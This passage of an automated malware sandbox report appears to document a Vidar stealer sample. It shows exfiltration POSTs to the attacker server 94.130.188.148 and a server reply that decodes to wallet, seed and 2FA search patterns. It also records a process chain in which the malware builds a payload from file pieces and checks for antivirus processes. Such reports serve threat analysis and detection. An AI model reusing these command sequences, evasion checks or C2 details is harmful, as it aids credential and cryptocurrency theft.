                                                                                      2024-08-29 18:49:55 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------FBAAAKFCAFIIDHIDGHIEContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------FBAAAKFCAFIIDHIDGHIEContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------FBAAAKFCAFIIDHIDGHIECont
                                                                                      2024-08-29 18:49:56 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:56 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:56 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                      Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.55995894.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:56 UTC306OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCB
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 457
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:56 UTC457OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------AEBAFBGIDHCBFHIECFCBCont
                                                                                      2024-08-29 18:49:57 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:57 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:57 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.55995994.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:58 UTC309OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 114253
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:58 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------IDHIEBAAKJDHIECAAFHCCont
                                                                                      2024-08-29 18:49:58 UTC16355OUTData Raw: 50 2f 41 50 45 56 54 78 47 44 35 50 5a 38 79 73 64 53 77 2b 4d 35 2f 61 63 72 75 61 48 67 37 78 42 4e 63 33 65 6c 61 46 65 35 4e 7a 5a 58 62 6d 4e 75 75 55 45 4d 6f 49 4a 39 69 51 50 70 39 4b 70 2b 4e 2f 38 41 6b 62 62 76 2f 64 6a 2f 41 50 51 46 72 55 38 4c 2b 41 64 57 30 58 78 48 61 61 6a 64 58 46 6d 38 55 4f 2f 63 49 33 63 74 79 68 55 59 79 6f 39 52 33 72 4c 38 62 2f 38 41 49 32 33 6e 30 6a 2f 39 41 57 75 57 69 36 55 73 63 6e 53 64 31 5a 2f 66 71 61 59 78 56 59 35 63 31 56 56 6e 7a 4c 37 74 44 6e 71 53 6c 6f 72 32 6a 35 6f 53 69 6c 70 4b 59 47 70 34 62 2f 35 47 58 54 66 2b 76 68 50 35 31 30 6e 6a 37 78 44 50 6f 32 70 58 56 72 61 35 53 61 39 73 6f 56 38 30 48 37 69 71 38 32 63 65 35 33 44 39 61 35 76 77 35 2f 79 4d 75 6d 2f 39 66 4b 66 7a 72 72 76 47 76
                                                                                      Data Ascii: P/APEVTxGD5PZ8ysdSw+M5/acruaHg7xBNc3elaFe5NzZXbmNuuUEMoIJ9iQPp9Kp+N/8Akbbv/dj/APQFrU8L+AdW0XxHaajdXFm8UO/cI3ctyhUYyo9R3rL8b/8AI23n0j/9AWuWi6UscnSd1Z/fqaYxVY5c1VVnzL7tDnqSlor2j5oSilpKYGp4b/5GXTf+vhP510nj7xDPo2pXVra5Sa9soV80H7iq82ce53D9a5vw5/yMum/9fKfzrrvGv
                                                                                      2024-08-29 18:49:58 UTC16355OUTData Raw: 67 63 54 6f 6d 2b 69 2f 77 43 44 39 35 36 4c 7a 4c 43 4e 79 6c 79 39 58 70 62 66 61 33 33 45 6c 76 65 50 5a 61 76 71 6d 6d 53 53 36 65 6b 75 6c 36 57 54 4e 64 33 55 48 6e 52 69 35 4d 30 51 62 6a 59 35 49 55 48 59 50 6c 50 63 39 7a 56 6e 54 39 52 48 6b 32 62 79 33 4f 69 4f 31 78 72 4c 32 37 72 39 69 35 76 45 45 63 52 45 63 4a 4d 51 45 5a 4a 59 67 46 6a 47 41 57 7a 6d 73 2b 54 54 62 6d 61 61 39 6e 6b 75 56 61 61 2b 79 4c 70 2f 4c 58 39 36 43 77 63 6a 47 4f 4f 56 42 34 78 30 71 64 4c 65 39 74 59 31 69 73 35 37 65 4b 4a 5a 54 4d 6d 36 31 69 64 34 35 43 41 43 36 4f 79 6c 6b 62 43 6a 6c 53 4f 67 72 4e 34 48 46 75 4f 72 31 30 2f 4f 37 4e 59 35 6e 67 56 4e 4a 52 73 6c 66 38 72 49 6f 44 58 72 33 54 64 4e 30 7a 79 62 47 31 6b 6b 75 49 70 4c 69 34 4e 31 45 6b 78 4a
                                                                                      Data Ascii: gcTom+i/wCD956LzLCNyly9Xpbfa33ElvePZavqmmSS6ekul6WTNd3UHnRi5M0QbjY5IUHYPlPc9zVnT9RHk2by3OiO1xrL27r9i5vEEcREcJMQEZJYgFjGAWzms+TTbmaa9nkuVaa+yLp/LX96CwcjGOOVB4x0qdLe9tY1is57eKJZTMm61id45CAC6OylkbCjlSOgrN4HFuOr10/O7NY5ngVNJRslf8rIoDXr3TdN0zybG1kkuIpLi4N1EkxJ
                                                                                      2024-08-29 18:49:58 UTC16355OUTData Raw: 55 55 55 47 67 59 55 55 67 6f 4e 4d 41 6f 6f 6f 6f 41 4b 53 6c 70 44 51 4d 4b 4b 4b 4b 41 43 6b 6f 6f 4e 4d 41 6f 6f 6f 70 6a 45 6f 6f 4e 46 41 42 52 53 55 74 41 77 6f 70 4b 57 67 41 70 4b 4b 4b 59 43 30 5a 70 4b 53 67 43 53 49 2f 76 55 2f 33 68 2f 4f 74 2b 38 50 2b 6d 53 2f 57 75 66 54 2f 57 4c 2f 41 4c 77 72 66 76 50 2b 50 75 54 36 2f 77 42 4b 35 36 76 78 6f 53 2b 49 68 6f 70 4b 51 31 4a 6f 4c 52 53 55 55 79 67 4e 4c 53 55 5a 6f 45 4c 53 55 55 55 44 43 69 69 69 6d 41 75 61 4d 38 30 32 6c 39 36 51 57 48 5a 39 52 52 6b 47 6d 30 55 57 46 59 69 76 76 2b 51 66 4a 2f 76 4c 56 58 54 50 76 53 2f 51 56 5a 76 54 2f 77 41 53 2b 62 36 72 2f 4f 71 75 6d 48 35 35 50 6f 4b 75 50 77 4d 44 53 78 51 4d 2b 6c 47 61 4d 31 6d 49 57 69 67 48 32 70 63 30 41 4a 6a 69 69 6c 7a
                                                                                      Data Ascii: UUUGgYUUgoNMAooooAKSlpDQMKKKKACkooNMAooopjEooNFABRSUtAwopKWgApKKKYC0ZpKSgCSI/vU/3h/Ot+8P+mS/WufT/WL/ALwrfvP+PuT6/wBK56vxoS+IhopKQ1JoLRSUUygNLSUZoELSUUUDCiiimAuaM802l96QWHZ9RRkGm0UWFYivv+QfJ/vLVXTPvS/QVZvT/wAS+b6r/OqumH55PoKuPwMDSxQM+lGaM1mIWigH2pc0AJjiilz
                                                                                      2024-08-29 18:49:58 UTC16355OUTData Raw: 4d 55 58 43 34 6d 4b 58 48 46 4c 69 6c 78 53 75 49 62 69 69 6e 59 6f 41 6f 75 46 78 75 4b 57 6e 59 78 32 6f 78 53 75 46 78 41 4b 74 57 41 2f 30 6e 2f 74 6d 2b 66 2b 2b 54 56 66 46 57 72 49 66 76 7a 2f 31 7a 66 2f 30 45 31 6e 55 2b 46 6b 74 6e 42 53 64 65 76 65 6f 69 66 58 6a 48 70 55 73 68 2b 59 31 45 54 58 70 64 45 64 38 64 68 75 65 4d 6d 6b 50 34 55 70 36 30 68 7a 36 56 4a 61 47 6e 70 53 66 53 6c 37 30 68 70 4d 6f 44 53 47 6c 49 34 78 2b 74 49 65 74 53 4d 53 6d 38 34 70 78 35 48 34 30 6d 63 48 4e 49 59 68 34 37 39 61 61 65 61 63 66 61 6d 6e 31 39 36 52 53 41 38 30 68 39 2b 31 4c 53 5a 34 6f 47 48 58 74 53 59 39 2b 61 4d 35 6f 4a 39 36 51 41 54 6b 65 39 4a 53 6e 4a 70 4d 59 4e 41 7a 30 4f 6b 70 61 4b 79 50 6b 68 4b 57 69 69 67 42 4b 4b 4b 4b 42 68 52 52
                                                                                      Data Ascii: MUXC4mKXHFLilxSuIbiinYoAouFxuKWnYx2oxSuFxAKtWA/0n/tm+f++TVfFWrIfvz/1zf/0E1nU+FktnBSdeveoifXjHpUsh+Y1ETXpdEd8dhueMmkP4Up60hz6VJaGnpSfSl70hpMoDSGlI4x+tIetSMSm84px5H40mcHNIYh479aaeacfamn196RSA80h9+1LSZ4oGHXtSY9+aM5oJ96QATke9JSnJpMYNAz0OkpaKyPkhKWiigBKKKKBhRR
                                                                                      2024-08-29 18:49:58 UTC16355OUTData Raw: 2f 2f 41 49 6d 6a 2f 68 4c 74 66 2f 36 43 54 66 38 41 66 6d 50 2f 41 4f 4a 72 6c 72 69 2f 54 7a 35 49 4c 58 7a 6a 4e 35 31 6b 45 6a 6d 77 47 52 62 6c 4e 79 68 2b 42 68 67 32 41 66 71 4f 42 53 58 2b 71 32 6c 71 64 52 6c 68 6c 6c 6c 74 6f 6d 74 78 61 50 67 66 76 66 4f 58 65 4d 34 36 34 55 4e 6e 48 66 46 55 70 35 65 33 62 6c 2f 72 54 2f 4d 69 56 4c 4f 49 70 76 6d 65 6e 6e 36 2f 35 66 6b 58 77 41 41 41 4f 67 70 61 68 6c 75 72 56 64 58 30 32 79 6a 6e 6b 64 5a 37 31 64 50 75 53 41 4d 78 7a 68 6c 44 71 50 59 42 78 6a 50 6f 61 6f 54 65 49 74 4e 53 78 74 39 52 53 31 31 44 37 4e 4a 63 54 32 78 67 65 64 41 37 4e 48 74 2b 64 58 38 76 42 58 35 38 66 64 36 6a 72 58 58 48 4d 4d 50 6f 6f 76 66 59 38 39 35 50 6a 48 7a 53 6b 74 74 2f 6d 61 74 46 4e 6e 6e 74 7a 72 4f 6f 57
                                                                                      Data Ascii: //AImj/hLtf/6CTf8AfmP/AOJrlri/Tz5ILXzjN51kEjmwGRblNyh+Bhg2AfqOBSX+q2lqdRlhllltomtxaPgfvfOXeM464UNnHfFUp5e3bl/rT/MiVLOIpvmenn6/5fkXwAAAOgpahlurVdX02yjnkdZ71dPuSAMxzhlDqPYBxjPoaoTeItNSxt9RS11D7NJcT2xgedA7NHt+dX8vBX58fd6jrXXHMMPoovfY895PjHzSktt/matFNnntzrOoW
                                                                                      2024-08-29 18:49:58 UTC16123OUTData Raw: 39 4f 75 5a 74 53 31 47 35 2b 32 61 72 63 44 45 6b 32 4d 4b 69 2f 33 56 48 59 66 35 34 72 69 76 47 50 2f 41 43 4e 56 37 2f 32 7a 2f 77 44 52 61 31 65 42 6c 48 36 78 47 45 58 64 4a 50 55 34 38 34 6a 4c 36 6e 4b 63 6c 5a 74 72 51 77 71 53 6c 6f 72 33 7a 34 30 54 38 4b 4f 61 57 69 67 4c 69 55 59 70 61 54 4e 4d 42 61 53 69 6b 6f 41 58 69 6b 6f 6f 70 44 43 69 69 69 67 4c 42 53 55 74 49 61 41 43 69 69 69 67 41 6f 4e 46 46 41 78 4b 4b 4b 4b 41 43 6b 6f 4e 46 41 77 6f 6f 6f 6f 41 53 69 69 69 67 41 70 44 53 30 6c 41 77 6f 6f 6f 6f 41 53 69 69 69 67 59 6e 65 69 6c 70 4b 41 43 69 69 6b 6f 47 46 46 46 49 61 42 68 52 52 53 55 49 41 6f 4e 46 49 61 59 77 6f 6f 6f 6f 41 53 69 69 69 67 59 68 6f 70 61 53 67 41 70 4b 57 6b 6f 47 46 4a 51 61 4b 42 6f 4b 53 67 30 55 44 45 6f
                                                                                      Data Ascii: 9OuZtS1G5+2arcDEk2MKi/3VHYf54rivGP/ACNV7/2z/wDRa1eBlH6xGEXdJPU484jL6nKclZtrQwqSlor3z40T8KOaWigLiUYpaTNMBaSikoAXikoopDCiiigLBSUtIaACiiigAoNFFAxKKKKACkoNFAwooooASiiigApDS0lAwooooASiiigYneilpKACiikoGFFFIaBhRRSUIAoNFIaYwooooASiiigYhopaSgApKWkoGFJQaKBoKSg0UDEo
                                                                                      2024-08-29 18:50:00 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:50:00 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:50:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.55996094.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:50:01 UTC306OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:50:01 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------EBGDAAKJJDAAKFHJKJKFCont
                                                                                      2024-08-29 18:50:01 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:50:01 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:50:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:14:46:51
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:913'051 bytes
                                                                                      MD5 hash:2F5226B4116CE79AFB6DCB32FA647954
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:14:46:52
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exit
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:14:46:52
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:14:46:54
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:tasklist
                                                                                      Imagebase:0xe30000
                                                                                      File size:79'360 bytes
                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:14:46:54
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:findstr /I "wrsa opssvc"
                                                                                      Imagebase:0x4c0000
                                                                                      File size:29'696 bytes
                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:14:46:54
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:tasklist
                                                                                      Imagebase:0xe30000
                                                                                      File size:79'360 bytes
                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:14:46:54
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                      Imagebase:0x4c0000
                                                                                      File size:29'696 bytes
                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:14:46:55
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /c md 271973
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:14:46:55
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:findstr /V "NorwegianLivedJerseyRelaxation" Para
                                                                                      Imagebase:0x4c0000
                                                                                      File size:29'696 bytes
                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:14:46:55
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /c copy /b ..\Ventures + ..\Thousands + ..\Enhance + ..\Kept + ..\Everything + ..\Say C
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:14:46:55
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:Tenant.pif C
                                                                                      Imagebase:0xaa0000
                                                                                      File size:893'608 bytes
                                                                                      MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
